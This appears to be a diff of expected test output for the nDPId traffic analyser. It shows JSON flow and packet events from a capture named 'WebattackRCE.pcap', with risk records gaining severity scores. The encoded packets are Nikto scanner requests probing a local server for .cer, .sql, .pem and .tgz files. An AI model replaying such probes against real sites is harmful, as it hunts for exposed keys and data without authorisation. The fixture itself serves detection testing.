 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
